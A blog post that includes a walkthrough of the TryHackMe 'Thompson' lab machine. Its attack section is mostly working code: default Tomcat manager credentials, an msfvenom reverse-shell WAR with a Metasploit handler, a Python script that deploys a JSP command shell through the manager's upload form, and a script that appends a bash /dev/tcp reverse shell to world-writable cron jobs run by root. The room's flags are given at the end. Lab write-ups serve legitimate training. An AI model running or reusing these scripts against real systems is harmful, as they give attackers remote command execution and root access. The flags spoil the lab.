
Where are all of the CTF Walkthroughs?

I moved the "non-blog" material.

So, I moved most of the "Capture the Flag walkthrough" material over to a wiki, powered by MediaWiki. The wiki format is designed to make information like that easily accessible: it gives a home to a large number of loosely related articles without needing a menu to navigate them or a Google search to find the content again.

Here's a more recent CTF walkthrough, since you may have expected that content here. Again, this one is duplicated over on the Wiki, where the rest of them now reside.

[Thompson] - TryHackMe

You can find this guide to the [Thompson] room on TryHackMe.com duplicated over on the MediaWiki, for example.

Room description: boot2root machine for FIT and BSides Guatemala CTF

Enumeration:

Nmap scan report for 10.10.238.164
Host is up, received echo-reply ttl 61 (0.099s latency).
Scanned at 2022-04-06 03:06:05 EDT for 19s
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fc052481987eb8db0592a6e78eb02111 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL+0hfJnh2z0jia21xVo/zOSRmzqE/qWyQv1G+8EJNXze3WPjXsC54jYeO0lp2SGq+sauzNvmWrHcrLKHtugMUQmkS9gD/p4zx4LjuG0WKYYeyLybs4WrTTmCU8PYGgmud9SwrDlEjX9AOEZgP/gj1FY+x+TfOtIT2OEE0Exvb86LhPj/AqdahABfCfxzHQ9ZyS6v4SMt/AvpJs6Dgady20CLxhYGY9yR+V4JnNl4jxwg2j64EGLx4vtCWNjwP+7ROkTmP6dzR7DxsH1h8Ko5C45HbTIjFzUmrJ1HMPZMo9ss0MsmeXPnZTmp5TxsxbLNJGSbDv7BS9gdCyTf0+Qq1
|   256 60c840abb009843d46646113fabc1fbe (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG6CiO2B7Uei2whKgUHjLmGY7dq1uZFhZ3wY5EWj5L7ylSj+bx5pwaiEgU/Velkp4ZWXM//thL6K1lAAPGLxHMM=
|   256 b5527e9c019b980c73592035ee23f1a5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIwYtK4oCnQLSoBYAztlgcEsq8FLNL48LyxC2RfxC+33
8009/tcp open  ajp13   syn-ack ttl 61 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http    syn-ack ttl 61 Apache Tomcat 8.5.5
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5

http://10.10.28.152:8080/manager/html

Requesting /manager/html prompts for HTTP Basic credentials. Tomcat's stock 401 page shows an example tomcat-users.xml entry, and on this box that example account is accepted as-is:

<user username="tomcat" password="s3cret" roles="manager-gui"/>

Log into /manager/html and notice that the "WAR file to deploy" form lets you upload and deploy an arbitrary WAR file, so any JSP packed into a WAR runs as the Tomcat service user.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.6.1.201 LPORT=4444 -f war -o shell.war

Start msfconsole and set up the handler before deploying the WAR:

use exploit/multi/handler
set PAYLOAD java/jsp_shell_reverse_tcp
set LHOST 10.6.1.201
set LPORT 4444
run

Deploy shell.war through the manager page, then click the /shell link in the application list (or request http://10.10.28.152:8080/shell/) to trigger the JSP. The handler catches a shell running as the tomcat user; the user flag is in /home/jake/user.txt, which that account can read.
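The same foothold without msfvenom, as an added example that is not part of the original walkthrough: it builds a one-file JSP web shell into a WAR and drives the HTML manager's upload form from a script. The target URL, credentials and WAR name are assumptions taken from the walkthrough; the manager page fragment embedded below is constructed so extract_nonce() can be exercised offline. The HTML interface is used deliberately: the tomcat:s3cret account above only carries manager-gui, and the text API at /manager/text/deploy needs manager-script, so it would answer 403 for this user.

```python
"""Deploy a hand-built JSP WAR through the Tomcat HTML manager (/manager/html).

Added example, not code from the walkthrough. Target, credentials and file
name are assumptions matching the walkthrough; nothing is sent unless
upload_war() is called.
"""
import base64
import io
import re
import urllib.request
import zipfile

TARGET = "http://10.10.28.152:8080"      # assumption: the box in the walkthrough
CREDS = ("tomcat", "s3cret")             # from the 401 page example
WAR_NAME = "shell.war"                   # Tomcat derives the context path: /shell

# Minimal JSP web shell: runs the 'cmd' query parameter and echoes its stdout.
CMD_JSP = r'''<%@ page import="java.io.*" %>
<% String cmd = request.getParameter("cmd");
if (cmd != null) {
  Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd});
  BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
  for (String l; (l = r.readLine()) != null;) out.println(l);
} %>'''

WEB_XML = ('<?xml version="1.0" encoding="UTF-8"?>\n'
           '<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">\n'
           '  <welcome-file-list><welcome-file>index.jsp</welcome-file></welcome-file-list>\n'
           '</web-app>\n')

# Constructed fragment of the manager page, so extract_nonce() can run offline.
SAMPLE_MANAGER_HTML = ('<form method="post" action="/manager/html/upload?'
                       'org.apache.catalina.filters.CSRF_NONCE=0123ABCD" '
                       'enctype="multipart/form-data">')


def build_war(jsp_source=CMD_JSP):
    """Return the bytes of a WAR (a zip) holding index.jsp plus a stub web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("index.jsp", jsp_source)
        war.writestr("WEB-INF/web.xml", WEB_XML)
    return buf.getvalue()


def war_entries(war):
    """List the entry names inside a WAR; used to check build_war() offline."""
    return zipfile.ZipFile(io.BytesIO(war)).namelist()


def basic_auth_header(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def extract_nonce(html):
    """The manager's CSRF filter embeds a per-session nonce in every form action."""
    m = re.search(r"CSRF_NONCE=([0-9A-Fa-f]+)", html)
    if not m:
        raise ValueError("no CSRF nonce in manager page (wrong creds or role?)")
    return m.group(1)


def multipart_body(war, filename, boundary="----warupload9b1f"):
    """Encode the WAR as the single 'deployWar' file field the HTML manager reads."""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="deployWar"; filename="{filename}"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n").encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + war + tail, f"multipart/form-data; boundary={boundary}"


def upload_war(war, base_url=TARGET, creds=CREDS, filename=WAR_NAME):
    """GET the manager page (nonce + JSESSIONID), then POST the WAR to /upload.
    Cookies must persist across both requests: the nonce is bound to the session."""
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
    auth = {"Authorization": basic_auth_header(*creds)}
    page = urllib.request.Request(f"{base_url}/manager/html", headers=auth)
    with opener.open(page, timeout=10) as r:
        nonce = extract_nonce(r.read().decode(errors="replace"))
    body, ctype = multipart_body(war, filename)
    req = urllib.request.Request(
        f"{base_url}/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE={nonce}",
        data=body, method="POST", headers={**auth, "Content-Type": ctype})
    with opener.open(req, timeout=10) as r:
        return r.status   # 200 with the refreshed application list on success


if __name__ == "__main__":
    print(upload_war(build_war()))
    print(f"then: curl '{TARGET}/{WAR_NAME[:-4]}/?cmd=id'")
```

Once deployed, the shell answers at /shell/?cmd=... as the tomcat user; a reverse shell can be launched from there with the same one-liner as the root step. If you would rather use the msfvenom WAR from the walkthrough, pass its bytes to upload_war() in place of build_war().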

Notice that /home/jake contains id.sh with world read/write/execute permissions (mode 777), and that root's crontab runs it every minute. Append another reverse shell one-liner to id.sh (point it at a second handler on a different port, since the first one is holding the tomcat shell), wait for the next cron run, and you have a root shell. Root's flag is in /root/root.txt.
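The privilege-escalation check above, generalised into a small script, as an added example that is not part of the original walkthrough: it parses a system crontab, resolves the scripts each job runs (including the "cd DIR && bash id.sh" form used on this box), flags the ones any user can write to, and appends the reverse-shell line. The crontab text is constructed to look like the Thompson entry, the id.sh body is a placeholder, and 10.6.1.201:5555 are placeholder listener values; demo() builds a throwaway directory tree so the whole thing runs offline.

```python
"""Find cron jobs that run a script anyone can write to, then plant a payload.

Added example, not code from the walkthrough. SAMPLE_CRONTAB is a constructed
stand-in for /etc/crontab on the box; on a real target call
find_writable_cron_scripts(open("/etc/crontab").read()) instead of demo().
"""
import os
import re
import stat
import tempfile

# Constructed sample in /etc/crontab format (assumption about the box's file).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
* * * * * root cd /home/jake && bash id.sh
"""

# Five schedule fields, the user, then the rest of the line is the command.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")


def parse_system_crontab(text):
    """Return (user, command) pairs, skipping comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#") or "=" in tokens[0]:
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m["user"], m["cmd"]))
    return jobs


def script_paths(cmd, root="/"):
    """Absolute paths of script-like tokens in a cron command.
    A leading 'cd DIR &&' sets the directory for relative names (as on the box).
    'root' lets demo() remap every path under a temporary directory."""
    cwd = root
    paths = []
    for part in re.split(r"\s*(?:&&|\|\||;)\s*", cmd):
        tokens = part.split()
        if not tokens:
            continue
        if tokens[0] == "cd" and len(tokens) > 1:
            cwd = os.path.join(root, tokens[1].lstrip("/"))
            continue
        for tok in tokens:
            if tok.startswith("/"):
                paths.append(os.path.join(root, tok.lstrip("/")))
            elif tok.endswith(".sh"):
                paths.append(os.path.join(cwd, tok))
    return paths


def world_writable(path):
    return os.path.isfile(path) and bool(os.stat(path).st_mode & stat.S_IWOTH)


def find_writable_cron_scripts(crontab_text, root="/"):
    """(user, path) for every script a cron job runs that other users may edit."""
    hits = []
    for user, cmd in parse_system_crontab(crontab_text):
        for path in script_paths(cmd, root):
            if world_writable(path):
                hits.append((user, path))
    return hits


def plant_reverse_shell(path, lhost, lport):
    """Append a bash reverse shell; cron runs it as the job's user next minute.
    Destructive on a real box: only use it on a target you are authorised to attack."""
    line = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'\n"
    with open(path, "a") as f:
        f.write(line)
    return line.strip()


def demo():
    """Offline run: create root/home/jake/id.sh with mode 777 and scan the sample."""
    root = tempfile.mkdtemp()
    jake = os.path.join(root, "home", "jake")
    os.makedirs(jake)
    script = os.path.join(jake, "id.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\n# placeholder body; the real id.sh is not shown\n")
    os.chmod(script, 0o777)
    hits = find_writable_cron_scripts(SAMPLE_CRONTAB, root)
    payload = plant_reverse_shell(hits[0][1], "10.6.1.201", "5555") if hits else None
    with open(script) as f:
        return hits, payload, f.read()


if __name__ == "__main__":
    hits, payload, contents = demo()
    print("world-writable cron scripts:", hits)
    print("appended:", payload)
```

The check is the point: /etc/cron.hourly in the first job is ignored because it is a directory, not a writable file, while id.sh in the second is flagged because root runs it and its mode has the other-write bit set. Start a second handler (or nc -lvnp 5555) before the next minute ticks over.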


user.txt

39400c90bc683a41a8935e4719f181bfc

root.txt

d89d5391984c0450a95497153ae7ca3a
